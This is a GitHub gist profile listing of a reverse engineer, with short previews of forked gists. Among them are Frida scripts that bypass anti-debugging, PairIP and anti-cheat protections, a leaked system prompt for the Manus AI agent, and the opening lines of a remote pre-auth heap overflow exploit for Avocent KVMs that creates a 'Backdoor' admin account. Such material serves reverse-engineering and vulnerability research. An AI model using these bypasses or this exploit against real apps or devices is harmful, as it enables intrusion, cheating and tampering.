ApkUnpacker apkunpacker

Android ɹǝǝuıƃuǝ ǝsɹǝʌǝᴚ, Android/iOS Dynamic and static analysis, Radare2, Frida, Vulnerability Research, RASP Bypass.

552 followers · 82 following

127.0.0.1
22:06 (UTC +05:30)
@apkunpacker

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

apkunpacker / uncrackable_syscalls_4.ts

Created May 15, 2025 01:58 — forked from r3bb1t/uncrackable_syscalls_4.ts

Frida script for bypassing direct sycalls in uncrackable 4


	class AntiAntiDebugV2 {
	readonly fakeMapsFile: string;
	/// This will be used for redirecting syscalls which are trying to open /proc/self/maps
	readonly fakeMapsFileNamePtr: NativePointer;
	readonly fridaRegex: RegExp;
	readonly procSelfTaskStatusRe: RegExp;
	readonly fakeFilePath: string;
	readonly fakeFilePathPtr: NativePointer;

apkunpacker / agent loop

Created March 11, 2025 08:03 — forked from jlia0/agent loop

Manus tools and prompts

	You are Manus, an AI agent created by the Manus team.

	You excel at the following tasks:
	1. Information gathering, fact-checking, and documentation
	2. Data processing, analysis, and visualization
	3. Writing multi-chapter articles and in-depth research reports
	4. Creating websites, applications, and tools
	5. Using programming to solve various problems beyond development
	6. Various tasks that can be accomplished using computers and the internet

apkunpacker / pairip_analysis.js

Created March 4, 2025 01:25 — forked from Ahmeth4n/pairip_analysis.js

simple PairIP executeVM() analyzer frida script.

	function hookNative() {

	const jniOnLoad = moduleHandle.findExportByName("JNI_OnLoad");
	if (!jniOnLoad) {
	console.log("[-] JNI_OnLoad not found!");
	return;
	}

	console.log("[+] JNI_OnLoad founded:", jniOnLoad);

apkunpacker / xcode-uninstall.sh

Created October 22, 2024 15:25 — forked from oxlb/xcode-uninstall.sh

SH file to uninstall Xcode from MacOS

	killall Xcode
	xcrun -k
	xcodebuild -alltargets clean
	rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang/ModuleCache"
	rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang.$(whoami)/ModuleCache"
	rm -rf /Applications/Xcode.app
	rm -rf ~/Library/Caches/com.apple.dt.Xcode
	rm -rf ~/Library/Developer
	rm -rf ~/Library/MobileDevice
	rm -rf ~/Library/Preferences/com.apple.dt.Xcode.plist

apkunpacker / universal_links.js

Created October 16, 2024 09:39 — forked from grepharder/universal_links.js

	Interceptor.attach(ObjC.classes.AppDelegate['- application:continueUserActivity:restorationHandler:'].implementation, {
	onEnter: function (args) {

	printHeader(args)

	this.application = ObjC.Object(args[2]);
	this.continueUserActivity = ObjC.Object(args[3]);
	this.restorationHandler = ObjC.Object(args[4]);

	console.log("application: " + this.application);

apkunpacker / zshield_notes.md

Created August 10, 2024 06:40 — forked from DavidBuchanan314/zshield_notes.md

Zimperium zShield RE Notes

Newer versions of the Rabbit R1's APK are protected by https://www.zimperium.com/zshield/ (I don't know this for certain, somebody told me it is but I haven't really seen any identifying marks in the code yet)

Interesting assets within the APK:

lib/arm64-v8a/liboptipkawfn.so    ~3MB packed/encrypted ELF
assets/optipkawfn/0.odex          only 41 bytes (EDIT: I think this is part of an asset obfuscation scheme, the real file contents are likely elsewhere - inside the .szip maybe?)
assets/optipkawfn.szip ~8MB - I predict containing encrypted+compressed bytecode

apkunpacker / guide.md

Created July 26, 2024 15:00 — forked from miticollo/build_frida.sh

How to build Frida (≥ 16.2.2) for iOS jailbroken devices

Here, I'll show you how to compile Frida (≥ 16.2.2) for both rootfull and rootless jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

apkunpacker / index.ts

Created July 14, 2024 13:54 — forked from commonuserlol/index.ts

ACTk ObscuredTypes hax with frida; tested on 2.0.2

	import "frida-il2cpp-bridge";

	function main() {
	const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
	// Note that on versions older than 2.x.y this isn't needed
	// Since ACTk bundled directly into Assembly-CSharp
	const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;

	// Target class
	const PlayerData = AssemblyCSharp.class("PlayerData");

apkunpacker / elf_format_cheatsheet.md

Created March 13, 2024 15:25 — forked from x0nu11byt3/elf_format_cheatsheet.md

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

Compilation

apkunpacker / asmpwn.py

Created December 9, 2023 06:59 — forked from aemmitt-ns/asmpwn.py

Remote pre-auth heap buffer overflow exploit for Avocent KVMs

	import socket, struct, sys
	p32 = lambda x: struct.pack(">I", x)
	p16 = lambda x: struct.pack(">h", x)
	p8 = lambda x: struct.pack(">b", x)

	# ASMP heap overflow exploit creates new applianceAdmin user
	def exploit(hostname, username="Backdoor", password="Backdoor"):
	global socks # python closes out of scope sockets
	port = 3211 # this is hardcoded in the binary
	print(f"[*] Exploiting ASMP on {hostname} port {port}")

NewerOlder